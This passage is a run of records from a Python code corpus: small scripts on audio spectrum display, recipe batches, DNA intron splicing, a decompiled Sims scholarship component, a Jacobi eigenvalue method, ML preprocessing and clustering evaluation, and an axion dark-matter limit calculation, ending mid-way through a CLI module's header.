input=True,\n output=False,\n frames_per_buffer=self.FRAME_LEN,\n stream_callback=self.callback)\n stream.start_stream()\n while stream.is_active():\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n self.recording = pyaudio.paAbort\n\n stream.start_stream()\n stream.close()\n\n # ==============\n # pygameのイベント管理\n # ==============\n def manage_event(self):\n for e in pygame.event.get():\n if e.type == QUIT:\n exit()\n if e.type == VIDEORESIZE:\n self.SCREEN_SIZE = e.size\n if e.type == KEYDOWN:\n if e.key == K_ESCAPE:\n exit()\n\n # ==============\n # 子クラスで定義\n # ==============\n def draw(self, pr):\n pass\n","sub_path":"spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"127073194","text":"#!/usr/bin/python\n\nimport math\n\n\ndef recipe_batches(recipe, ingredients):\n ingredient_dict = ingredients\n recipe_dict = recipe\n\n total = None\n\n for key in recipe_dict.keys():\n if key not in ingredient_dict:\n return 0\n batches = ingredient_dict[key]//recipe_dict[key]\n if batches == 0:\n return 0\n\n if not total:\n total = batches\n else:\n total = min(total, batches)\n\n return total\n\n\nif __name__ == '__main__':\n # Change the entries of these dictionaries to test\n # your implementation with different inputs\n recipe = {'milk': 100, 'butter': 50, 'flour': 5}\n ingredients = {'milk': 132, 'butter': 48, 'flour': 51}\n print(\"{batches} batches can be made from the available ingredients: {ingredients}.\".format(\n batches=recipe_batches(recipe, ingredients), ingredients=ingredients))\n","sub_path":"recipe_batches/recipe_batches.py","file_name":"recipe_batches.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97571910","text":"#!/usr/bin/python\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Splicing out introns, part one\n# Here is a short section of genomic DNA:\n# ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT\n# It comprises two exons and an intron. The first exon runs from the start of the sequence to the sixty-third character, and the second exon runs from the ninety-first character to the end of the sequence. Write a program that will print just the coding regions of the DNA sequence.\n\ngenomicDNA = \"ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT\"\n# get substring of 1st intron\nexon1 = genomicDNA[0:63]\n# get substring of 2nd intron\nexon2 = genomicDNA[90:1000]\n# print exons\nprint(\"1st exon sequence: \" + exon1)\nprint(\"2nd exon sequence: \" + exon2)\n\n# Splicing out introns, part two\n# Using the data from part one, write a program that will calculate what percentage of the DNA sequence is coding.\n\n# Calculate total DNA length\nDNAlength = len(genomicDNA)\n# calculate length of coding regions\nexons_length = len(exon1 + exon2)\n# calculate percent coding\ncoding = exons_length / DNAlength\n# print out coding content\nprint(\"Percent coding DNA: \" + str(coding))\n\n# Splicing out introns, part three\n# Using the data from part one, write a program that will print out the original genomic DNA sequence with coding bases in uppercase and non-coding bases in lowercase.\n\n# get substring of intron\nintron = genomicDNA[63:90].lower()\n# print the whole sequence with exons in caps\nprint(\"Genomic DNA formatted EXONinronEXON: \" + exon1 + intron +exon2)\n\n","sub_path":"SplicingOutIntrons.py","file_name":"SplicingOutIntrons.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316183902","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\sims\\university\\university_scholarship_letter_component.py\n# Compiled at: 2019-10-15 01:30:09\n# Size of source mod 2**32: 6226 bytes\nfrom protocolbuffers import SimObjectAttributes_pb2 as protocols\nfrom objects.components import Component, types, componentmethod_with_fallback\nfrom sims4.localization import LocalizationHelperTuning\nfrom sims4.repr_utils import standard_repr\nfrom sims4.tuning.tunable import HasTunableFactory\nimport services, sims4\nlogger = sims4.log.Logger('Scholarship Letter Component', default_owner='shipark')\n\nclass ScholarshipLetterComponent(Component, HasTunableFactory, component_name=types.SCHOLARSHIP_LETTER_COMPONENT, persistence_key=protocols.PersistenceMaster.PersistableData.ScholarshipLetterComponent):\n\n def __init__(self, *args, **kwargs):\n (super().__init__)(*args, **kwargs)\n self._scholarship_id = None\n self._applicant_sim_id = None\n\n def set_applicant_sim_id(self, sim_id):\n self._applicant_sim_id = sim_id\n\n def set_scholarship_id(self, evaluated_scholarship_id):\n self._scholarship_id = evaluated_scholarship_id\n\n @componentmethod_with_fallback(lambda : None)\n def get_stored_sim_info(self):\n return services.sim_info_manager().get(self._applicant_sim_id)\n\n def get_applicant_name(self):\n if self._applicant_sim_id is None:\n logger.error(\"Applicant Sim ID is None and cannot be in order to get the applicant's name for object with scholarship letter component ({}).\", self.owner)\n return\n applicant = services.sim_info_manager().get(self._applicant_sim_id)\n if applicant is None:\n logger.error(\"Applicant Sim is None and cannot be in order to get the applicant's name for object with scholarship letter component ({}).\", self.owner)\n return\n return LocalizationHelperTuning.get_sim_full_name(applicant)\n\n def get_scholarship_amount(self):\n if self._scholarship_id is None:\n logger.error(\"Scholarship ID is None and cannot be in order to get the scholarships's amount for object with scholarship letter component ({}).\", self.owner)\n return\n if self._applicant_sim_id is None:\n logger.error(\"Applicant Sim ID is None and cannot be in order to get the scholarships's amount for object with scholarship letter component ({}).\", self.owner)\n return\n sim = services.sim_info_manager().get(self._applicant_sim_id)\n if sim is None:\n logger.error(\"Applicant Sim is None and cannot be in order to get the scholarships's amount for object with scholarship letter component ({}).\", self.owner)\n return\n scholarship = services.snippet_manager().get(self._scholarship_id)\n return scholarship.get_value(sim.sim_info)\n\n def get_scholarship_name(self):\n if self._scholarship_id is None:\n logger.error(\"Scholarship ID is None and cannot be in order to get the scholarships's name for object with scholarship letter component ({}).\", self.owner)\n return\n scholarship = services.snippet_manager().get(self._scholarship_id)\n return scholarship.display_name()\n\n def get_scholarship_description(self):\n if self._scholarship_id is None:\n logger.error(\"Scholarship ID is None and cannot be in order to get the scholarships's description for object with scholarship letter component ({}).\", self.owner)\n return\n scholarship = services.snippet_manager().get(self._scholarship_id)\n return scholarship.display_description()\n\n def save(self, persistence_master_message):\n persistable_data = protocols.PersistenceMaster.PersistableData()\n persistable_data.type = protocols.PersistenceMaster.PersistableData.ScholarshipLetterComponent\n scholarship_letter_component_save = persistable_data.Extensions[protocols.PersistableScholarshipLetterComponent.persistable_data]\n if self._scholarship_id is not None:\n scholarship_letter_component_save.scholarship_id = self._scholarship_id\n if self._applicant_sim_id is not None:\n scholarship_letter_component_save.applicant_sim_id = self._applicant_sim_id\n persistence_master_message.data.extend([persistable_data])\n\n def load(self, game_component_message):\n scholarship_letter_component = game_component_message.Extensions[protocols.PersistableScholarshipLetterComponent.persistable_data]\n if scholarship_letter_component.scholarship_id is not None:\n self._scholarship_id = scholarship_letter_component.scholarship_id\n if scholarship_letter_component.applicant_sim_id is not None:\n self._applicant_sim_id = scholarship_letter_component.applicant_sim_id\n\n def __repr__(self):\n return standard_repr(self, self.owner)","sub_path":"Scripts/simulation/sims/university/university_scholarship_letter_component.py","file_name":"university_scholarship_letter_component.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"619649655","text":"'''\r\nCreated on 19/01/2014\r\n\r\n@author: Ben\r\n'''\r\nfrom settings import *\r\nimport os, logging\r\n\r\ndef lookForApp(modLocation, appName):\r\n modules = [ modules for modules in os.listdir(modLocation) if os.path.isdir(os.path.join(modLocation, modules)) ] \r\n if appName in modules:\r\n return modLocation\r\n else:\r\n for mod in modules:\r\n if mod == appName:\r\n location = os.path.join(modLocation, mod)\r\n if os.path.isdir(location):\r\n return modLocation\r\n else:\r\n return lookForApp(os.path.join(modLocation, mod), appName)\r\n return False\r\n # by this point it is established that it isn't in the modules package\r\n # must be in the core\r\n \r\ndef findResource(relativeLocation):\r\n logging.basicConfig(format='%(asctime)s %(message)s')\r\n logging.info(\"Looking for resource \" + relativeLocation)\r\n split = relativeLocation.split(\"-\")\r\n baseDir = BASE_DIR\r\n location = baseDir\r\n moduleLocation = os.path.join(baseDir, \"Modules\")\r\n coreModules = [ name for name in os.listdir(baseDir) if os.path.isdir(os.path.join(baseDir, name)) ]\r\n modules = [ modules for modules in os.listdir(moduleLocation) if os.path.isdir(os.path.join(moduleLocation, modules)) ]\r\n topDir = split[0]\r\n if topDir in coreModules:\r\n logging.info(\"Resource is using an absolute address\")\r\n location = topDir\r\n # Either it's core or it's using the full path to the modules\r\n else:\r\n logging.info(\"The resource location was not an absolute path from the project's base directory\")\r\n location = lookForApp(os.path.join(baseDir, \"Jabberwocky\"), topDir)\r\n if location == False:\r\n location = lookForApp(moduleLocation, topDir)\r\n for path in split:\r\n if location == False:\r\n location = baseDir\r\n location = os.path.join(location, path)\r\n logging.info(\"Resource found at: \" + location)\r\n if os.path.isfile(location):\r\n logging.info(\"The file location can be found\")\r\n return location\r\n else:\r\n logging.error(\"File,\" + location + \" , does not exist\")\r\n raise Exception(\"FileNotFound\", location + \" doesn't exists\")\r\n \r\n","sub_path":"Jabberwocky/ResourceLocator.py","file_name":"ResourceLocator.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"351375624","text":"from numpy import *\nimport fys3150_project2_jacobi_rot_max\nimport fys3150_project2_unit_tests\n\ndef Jacobi_Method(A):\n n = len(A[0])\n tol = 1E-10 #Limit which gives off-diagonal elements zero\n iter = 0\n iter_max = 10E+8 #Number of iterations\n offdiag_max = 1000.0 #Just a number bigger that tol\n\n A_new = A.copy() #Copying A, as so not to overwrite it\n R = eye(n) #Identity matrix for assigning eigenvalues\n\n while (fabs(offdiag_max) > tol and iter <= iter_max):\n #l = 0\n #k = 0\n if iter == 0:\n fys3150_project2_unit_tests.test_max_offdiag()\n fys3150_project2_unit_tests.test_JacobiRotate(tol)\n l,k = fys3150_project2_jacobi_rot_max.max_offdiag(A_new,n)\n offdiag_max = A_new[l][k] #Updating max off-diagonal element of A\n fys3150_project2_jacobi_rot_max.JacobiRotate(A_new,R,l,k,n)\n iter += 1\n lamdas = diagonal(A_new)\n\n return lamdas, [R[:,i] for i in range(0,n)], iter\n","sub_path":"Project2/Python/fys3150_project2_jacobi_method.py","file_name":"fys3150_project2_jacobi_method.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"373286584","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 24 11:54:30 2018\n\n@author: weikaiqi\nFunction: DownSampling\n\n\"\"\"\nimport numpy as np\n\n\ndef Random_DownSampling(train, X, y, rate = 4):\n '''\n Downsamping the sampe\n '''\n \n train[\"toxic_yes\"] = (train['toxic'] + train['severe_toxic'] + train['obscene'] + \n train['threat'] + train['insult'] + train['identity_hate'])\n\n train[\"toxic_yes\"] = train[\"toxic_yes\"].apply(lambda x: 1 if x > 0 else 0)\n yc = train[\"toxic_yes\"].values\n \n \n index = np.argwhere(yc==0).flatten()\n \n num_tot = y.shape[0]\n num_is = len(index)\n num_ns = num_tot - num_is\n \n print(\"number of non_toxic sample: {}\".format(num_is))\n print(\"number of toxic sample: {}\".format(num_ns))\n print(\"before non_toxic/toxic rate: {}\".format(num_is/num_ns))\n \n #num_af = int(num_is/2)\n num_af = int(num_is - num_ns*rate)\n \n index = np.random.choice(index,num_af)\n notindex = np.array([i for i in range(num_tot) if i not in index])\n \n yselect = np.take(y, notindex, axis=0)\n Xselect = np.take(X, notindex, axis=0)\n print(\"after non_toxic/toxic rate: {}\".format(num_af/num_ns))\n \n return Xselect, yselect\n","sub_path":"pylib/ReSampling.py","file_name":"ReSampling.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434334807","text":"import numpy as np\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import SVC\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.model_selection import ParameterGrid, GridSearchCV\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import plot_confusion_matrix, mean_squared_error, plot_precision_recall_curve, plot_roc_curve\nfrom visualization.hinton import hinton\nfrom models.sequential_network import SequentialNetwork\nfrom utils.calculate_explicitness import calculate_explicitness\nfrom utils.modularity import compute_deviations, compute_mutual_infos\n\nclass NTrainIter():\n def __init__(self, x, y, n, n_folds):\n self.xs = x.shape\n self.ys = y.shape\n self.n = n\n self.n_folds = n_folds\n self.i = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if i == n_folds:\n raise StopIteration\n else:\n tr_idx = arrange(i * n, (i + 1) * n)\n test_idx = arrange(0, i * n) + arrange((i + 1) * n, self.xs[0])\n if (i + 1) * n > x.shape[0]:\n raise StopIteration\n i += 1\n return tr_idx, test_idx\n\n\ndef label_efficiency(model, dataloader_train, dataloader_val, dataloader_test, n = [60, 240]):\n device = next(model.parameters()).device\n latent_mus, latent_logvars, labels, sample_indexes = get_representation(model, dataloader_train, device)\n latent_mus_v, latent_logvars_v, labels_v, sample_indexes_v = get_representation(model, dataloader_val, device)\n latent_mus_t, latent_logvars_t, labels_t, sample_indexes_t = get_representation(model, dataloader_test, device)\n accs = []\n for i in n:\n clf = GridSearchCV(RandomForestClassifier(n_estimators = 100, random_state=0), {\"max_depth\": [3, 5, 10, 15, 20]}, \"accuracy\")\n\n clf.fit(latent_mus[:i * 10], sample_indexes[:i * 10])\n acc = clf.score(latent_mus_t, sample_indexes_t)\n accs.append(acc)\n \n return n, accs\n\n\n\ndef get_representation(model, dataloader, device):\n mus = []\n logvars = []\n labels = []\n si = []\n model.eval()\n for (inputs, label, index) in dataloader:\n\n m, l = model.encoder(inputs.float().to(device))\n mus.append(m.detach().cpu().numpy())\n logvars.append(l.detach().cpu().numpy())\n\n labels.append(label)\n si.append(index)\n\n mus = np.concatenate(mus)\n logvars = np.concatenate(logvars)\n labels = np.concatenate(labels)\n si = np.concatenate(si)\n\n return mus, logvars, labels, si\n\ndef compute_explicitness(accuracy, n_cat):\n return 1.0 - n_cat * accuracy\n \ndef compute_compactness(r):\n p = r / np.sum(r, axis=1)[:, np.newaxis]\n c = 1 + np.sum(p * (np.log(p) / np.log(p.shape[1])), axis=1)\n\n \n\n return c\n\ndef compute_modularity(r):\n p = r / np.sum(r, axis=0)[np.newaxis, :]\n d = 1 + np.sum(p * (np.log(p) / np.log(p.shape[0])), axis=0)\n\n pm = np.sum(r, axis=0) / np.sum(r)\n modularity = np.dot(d, pm)\n\n return modularity, d\n\ndef one_hot(a):\n b = np.zeros((a.size, a.max() + 1))\n b[np.arange(a.size), a] = 1\n\n return b\ndef compute_mean_auc(model, dataloader):\n device = next(model.parameters()).device\n latent_mus, latent_logvars, labels, sample_indexes = get_representation(model, dataloader, device)\n mean_auc, all_aucs, all_aucs_factors, all_aucs_factor_vals = calculate_explicitness(latent_mus, one_hot(sample_indexes))\n\n return np.mean(mean_auc)\n\n\ndef compute_DCI(model, dataloader_train, dataloader_val, dataloader_test, writer, save_hinton=True):\n device = next(model.parameters()).device\n label_names = [\"background\", \"bottom\", \"other\", \"sandeel\"]\n \n latent_mus, latent_logvars, labels, sample_indexes = get_representation(model, dataloader_train, device)\n latent_mus_v, latent_logvars_v, labels_v, sample_indexes_v = get_representation(model, dataloader_val, device)\n latent_mus_t, latent_logvars_t, labels_t, sample_indexes_t = get_representation(model, dataloader_test, device)\n\n mean_auc, all_aucs, all_aucs_factors, all_aucs_factor_vals = calculate_explicitness(latent_mus_v, one_hot(sample_indexes_v))\n \n mi = compute_mutual_infos(latent_mus_v, one_hot(sample_indexes_v))\n dev, thet = compute_deviations(mi, label_names)\n\n \n n_classes = sample_indexes.max() + 1\n predictions = []\n feature_importance = []\n mses = []\n mses_t = []\n\n \n\n fig, axs = plt.subplots(1, n_classes, figsize=(12, 4))\n for i in range(n_classes):\n trees_clf = RandomForestClassifier(n_estimators = 250, max_depth=10, random_state=0)\n trees_clf.fit(latent_mus, one_hot(sample_indexes)[:, i])\n \n pred = trees_clf.predict_proba(latent_mus)\n pred_v = trees_clf.predict_proba(latent_mus_v)\n pred_t = trees_clf.predict_proba(latent_mus_t)\n \n mse_v = mean_squared_error(one_hot(sample_indexes_v)[:, i], pred_v[:, 1])\n mses.append(mse_v)\n\n mse_t = mean_squared_error(one_hot(sample_indexes_t)[:, i], pred_t[:, 1])\n mses_t.append(mse_t)\n\n feature_importance.append(np.abs(trees_clf.feature_importances_))\n\n plot_roc_curve(trees_clf, latent_mus_v, one_hot(sample_indexes_v)[:, i], name=label_names[i], ax=axs[i])\n\n \n writer.add_figure(\"DCI/ROC\", fig)\n\n\n\n feature_importance = np.vstack(feature_importance)\n mse = np.mean(mses)\n mse_t = np.mean(mses_t)\n\n explicitness = compute_explicitness(mse, n_classes)\n modularity, individual_modularity = compute_modularity(feature_importance)\n compactness = compute_compactness(feature_importance)\n if save_hinton:\n fig, ax = plt.subplots(1, 1, figsize=(8, 4))\n hinton(feature_importance.T, \", \".join(label_names), \"$\\mathbf{z}$\", ax=ax, fontsize=18)\n writer.add_figure(\"DCI/Hinton\", fig)\n \n writer.add_scalar(\"DCI/modularity\", modularity)\n writer.add_scalar(\"DCI/explicitness\", explicitness)\n writer.add_scalar(\"DCI/information\", mse)\n\n return modularity, explicitness, mse, individual_modularity, compactness\n\n\n\n\ndef validate_clustering(model, clusterer, dataloader_train, dataloader_test, samplers_test, device, capacity, vb, fig_path=\"output/clustering.png\", i=0, n_visualize=250, save_plot=True, writer=None, dataloader=None):\n enc = model.encoder\n\n \n latent_mus = []\n latent_logvars = []\n sample_indexes = []\n \n latent_mus, latent_logvars, labels, sample_indexes = get_representation(model, dataloader_train, device)\n latent_mus_t, latent_logvars_t, labels_t, sample_indexes_t = get_representation(model, dataloader_test, device)\n\n # latent_mu, latent_logvar = enc(test_inputs.to(device))\n # latent_mus = latent_mu.data.cpu().numpy()\n # latent_logvars = latent_logvar.data.cpu().numpy()\n # sample_indexes = si_test.data.cpu().numpy()\n \n # latent_mus = latent_mus.reshape(latent_mus.shape[0], -1)\n #me = PCA(n_components=3, random_state = 42).fit_transform(latent_mus)\n clusterer.fit(latent_mus)\n best_labels = clusterer.labels_\n\n best_r_score = adjusted_rand_score(best_labels, sample_indexes)\n #r_score = adjusted_rand_score(best_labels, sample_indexes)\n\n pca = PCA(n_components=2, random_state = 42).fit(latent_mus) \n me = pca.transform(latent_mus)\n\n fig, ax = plt.subplots(1, 3, figsize=(12, 5))\n\n ax[0].scatter(me[:n_visualize][:, 0], me[:n_visualize][:, 1], c=best_labels[:n_visualize])\n ax[0].set_title(\"DBSCAN clusters\")\n\n colors = np.array([\"r\", \"g\", \"b\", \"tab:orange\", \"purple\", \"cyan\"])\n for si in np.unique(sample_indexes[:n_visualize]):\n sm = sample_indexes[:n_visualize] == si\n ax[2].scatter(me[:n_visualize][sm, 0], me[:n_visualize][sm, 1], alpha=0.4, c=colors[si], label=str(np.array(samplers_test)[:n_visualize][si]))\n ax[2].set_title(\"original labels\")\n\n ax[2].legend()\n\n X_train, X_val, y_train, y_val, pca_transformed_train, pca_transformed = train_test_split(latent_mus, sample_indexes, me, test_size=0.2)\n X_train, y_train = latent_mus, sample_indexes\n X_val, y_val = latent_mus_t, sample_indexes_t \n clf = LogisticRegression(random_state=0, multi_class=\"auto\")\n clf = SVC(decision_function_shape='ovo')\n #clf = SequentialNetwork(capacity, si_test.max() + 1, device, verbose=True)\n\n \n #clf = make_pipeline(StandardScaler(), SVC(gamma=\"auto\"))\n if model.__class__.__name__ == \"AAESS\":\n clf_predictions = model.classify(test_inputs).data.cpu().numpy()\n ax[1].scatter(pca_transformed_train[:n_visualize][:, 0], pca_transformed_train[:n_visualize][:, 1], c=colors[clf_predictions[:n_visualize]])\n ax[1].set_title(\"AAE semi supervised classifications\")\n clf_acc = accuracy_score(sample_indexes, clf_predictions)\n else:\n clf.fit(X_train, y_train)\n\n cfm = plot_confusion_matrix(clf, X_val, y_val, display_labels=[\"Background\", \"Seabed\", \"Other\", \"Sandeel\"], normalize=\"true\")\n writer.add_figure(f\"Confusion matrix classifier {clf.__class__.__name__}\", cfm.figure_, i)\n\n \n clf_predictions = clf.predict(X_val)\n\n X_val_t = pca.transform(X_val) \n\n ax[1].scatter(X_val[:n_visualize][:, 0], X_val[:n_visualize][:, 1], c=colors[clf_predictions[:n_visualize]])\n ax[1].set_title(\"SVM RBF classifications\")\n\n\n clf_acc = accuracy_score(y_val, clf_predictions)\n\n\n \n fig.suptitle(f\"cap: {capacity} beta: {vb} r_score: {best_r_score}, classifier accuracy: {clf_acc}\")\n writer.add_figure(\"Clustering fig\", fig, i, close=False)\n if save_plot:\n fig.savefig(fig_path)\n plt.close(fig)\n if save_plot:\n print(f\"classifier accuracy: {clf_acc}\")\n\n\n return best_r_score, clusterer, clf, clf_acc\n\n\n\n","sub_path":"visualization/validate_clustering.py","file_name":"validate_clustering.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451849524","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\ndataset = pd.read_csv('Data.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values\n\n# Fix missing data\nimputer = SimpleImputer(strategy = 'mean')\nimputer = imputer.fit(X[:, 1:3])\nX[:, 1:3] = imputer.transform(X[:, 1:3])\n\n# Encode categorical data\nlabelencoder_X = LabelEncoder()\nX[:, 0] = labelencoder_X.fit_transform(X[:, 0])\nonehotencoder = OneHotEncoder(categorical_features = [0])\nX = onehotencoder.fit_transform(X).toarray()\n\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n\n# Split data into training and test set\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature scaling\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n","sub_path":"data_preprocessing/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252044627","text":"import urllib.request\nimport html.parser\n\n#def main():\n# 取得先URL\nurl = \"https://algorithm.joho.info/\"\n# HTMLファイルを開く\ndata = urllib.request.urlopen(url)\n\n# HTMLの取得\nhtml = data.read()\n\n# 表示\nprint(html)\n\n# HTMLファイルを閉じる\ndata.close()\n\n\n#if __name__ == \"__main__\":\n# main()","sub_path":"MyOpenCV/filter/url/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327284490","text":"import matplotlib\nmatplotlib.use('Agg')\nimport os\nfrom Axion import ALP, SolarAxion\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nimport sys\nimport matplotlib.pyplot as plt\nimport blueice as bi\nfrom tqdm import tqdm\n\nfrom blueice.inference import bestfit_scipy\n\nPLOT = True\nminimize_kwargs = {'method' : \"Powell\", \"options\" : {'maxiter' : 10000000}}\n\ndatadir = '/home/ershockley/analysis/axions/data'\n\nsciencerun = \"SR1\"\n\ndef make_limit(axion_type_str, mass, file_counter):\n if axion_type_str == 'solar_axion':\n axionobject = SolarAxion\n bound = 1e4\n elif axion_type_str == 'ALP':\n axionobject = ALP\n bound = 1e4\n else:\n raise ValueError(\"axion type must be \\'ALP\\' or \\'solar_axion\\'\")\n\n bi.data_reading.CACHE = dict()\n\n axion=axionobject(mass)\n axion_type=None\n\n if sciencerun == 'SR0':\n data = pd.read_csv(os.path.join(datadir, 'xe1t_sr0.csv'))\n data['cs2'] = data['cs2_new']\n elif sciencerun == 'SR1':\n data = pd.read_hdf(os.path.join(datadir,'none_SR1_pax6.8.0_hax2.4.0_lax1.5.1_cs1LT200_fv1_cuts1.h5'), 'table')\n analysis_space = {var: space for var, space in axion.config['analysis_space']}\n for var in ['cs1', 'cs2']:\n data = data[data.apply(lambda x: min(analysis_space[var]) <= x[var] <= max(analysis_space[var]), axis=1)]\n else:\n raise NotImplementedError\n\n for type in ['solar_axion', 'ALP']:\n if type in axion.sources:\n axion_type = type\n if axion_type is None:\n print(axion.sources)\n raise ValueError(\"There are no axion sources\")\n\n lf = bi.UnbinnedLogLikelihood(axion.config)\n lf.add_rate_parameter(axion_type)\n lf.add_rate_parameter('erbkg')\n lf.prepare()\n lf.set_data(data)\n axion_rm = '%s_rate_multiplier' % axion_type\n\n bestfit, max_ll = bestfit_scipy(lf, minimize_kwargs=minimize_kwargs)\n\n axion_best = bestfit[axion_rm]\n print(\"Axion best: %g\" % axion_best)\n er_best = bestfit['erbkg_rate_multiplier']\n\n # get p value\n # see arXiv:1007.1727v3\n newargs = {axion_rm: 0,\n 'minimize_kwargs': minimize_kwargs}\n null_fit, null_ll = bestfit_scipy(lf, **newargs)\n\n print(max_ll, null_ll, max_ll-null_ll)\n q0 = 2*(max_ll - null_ll) if axion_best>0 else 0\n print(q0)\n p = 1 - stats.norm.cdf(np.sqrt(q0))\n\n # set limit\n multiplier_limit = bi.inference.one_parameter_interval(lf, axion_rm, bound,\n bestfit_routine=bestfit_scipy,\n minimize_kwargs=minimize_kwargs)\n\n if axion_type == 'ALP':\n g_limit = np.sqrt(multiplier_limit) * axion.g_scale\n elif axion_type == 'solar_axion':\n g_limit = (multiplier_limit**0.25) * axion.g_scale\n print(\"g limit: %0.3e\" % g_limit)\n\n fc_str = str(file_counter).zfill(3)\n\n with open(\"/home/ershockley/analysis/axions/limit_data/%s_limit_%s.txt\" % (axion_type, fc_str), \"w\") as f:\n f.write(\"mass,glimit,axion_best,er_best,pvalue\\n\")\n f.write(\"%f,%e,%f,%f,%f\" % (mass,g_limit,axion_best,er_best,p))\n\n ##################### MAKE PLOTS #####################################################\n if PLOT:\n print(\"Plotting\")\n axion_space = (axion_rm, np.logspace(-5, 5, 500))\n er_space = ('erbkg_rate_multiplier', np.linspace(0, 2, 100))\n\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(30, 8))\n label = 'LL ratio'\n filename = \"/home/ershockley/analysis/axions/likelihood_plots/%s_likelihood_%s.png\" % (axion_type, fc_str)\n\n ##### PLOT 1 #######\n plt.sca(ax1)\n bi.inference.plot_likelihood_ratio(lf, axion_space, bestfit_routine=bestfit_scipy,\n minimize_kwargs=minimize_kwargs)\n plt.axhline(stats.norm.ppf(0.9) ** 2 / 2,\n label='p=0.1', color='k', linestyle='--')\n plt.axvline(multiplier_limit, ls='--', color='purple', label='90% U.L.')\n plt.xscale('log')\n plt.ylim(0, 15)\n plt.xlabel(axion_rm)\n plt.ylabel(label)\n\n ##### PLOT 2 #######\n plt.sca(ax2)\n bi.inference.plot_likelihood_ratio(lf, axion_space, er_space, bestfit_routine=bestfit_scipy,\n minimize_kwargs=minimize_kwargs)\n plt.xlabel(axion_rm)\n plt.ylabel('erbkg_rate_multiplier')\n plt.xscale('log')\n plt.colorbar(label=label)\n\n plt.savefig(filename)\n\n del f\n\n print(\"Plots made\")\n\n ######################### SENSITIVITY CHECK ############################################\n n_trials = 1000\n limits_lf = np.zeros(n_trials)\n background_datasets = [lf.base_model.simulate(rate_multipliers={axion_type : 0}) for _ in range(n_trials)]\n\n print(\"got to for loop\")\n for i, d in enumerate(background_datasets):\n lf.set_data(d)\n limits_lf[i] = bi.inference.one_parameter_interval(lf, axion_rm, 1e4,\n bestfit_routine=bestfit_scipy,\n minimize_kwargs=minimize_kwargs)\n\n with open(\"/home/ershockley/analysis/axions/limit_data/%s_sensitivity_%s.txt\" % (axion_type, fc_str), \"w\") as f:\n f.write(\"%s mass (keV) : %f\\n\" % (axion_type, mass))\n for l in limits_lf:\n f.write(\"%e\\n\" % l)\n\nif __name__ == '__main__':\n make_limit(sys.argv[1], float(sys.argv[2]), sys.argv[3])\n","sub_path":"axionlimit.py","file_name":"axionlimit.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"512566160","text":"#!/usr/bin/env python3\n#\n# Copyright 2021 Graviti. Licensed under MIT License.\n#\n\n\"\"\"Command-line interface.\n\nUse 'gas' + COMMAND in terminal to operate on datasets.\n\nUse 'gas config' to configure environment.\n\nUse 'gas create' to create a dataset.\n\nUse 'gas delete' to delete a dataset.\n\nUse 'gas ls' to list data.\n\nUse 'gas cp' to upload data.\n\nUse 'gas rm' to delete data.\n\n\"\"\"\n\nimport logging\nimport os\nimport sys\nfrom configparser import ConfigParser\nfrom pathlib import Path, PurePosixPath\nfrom typing import Dict, Iterable, Iterator, 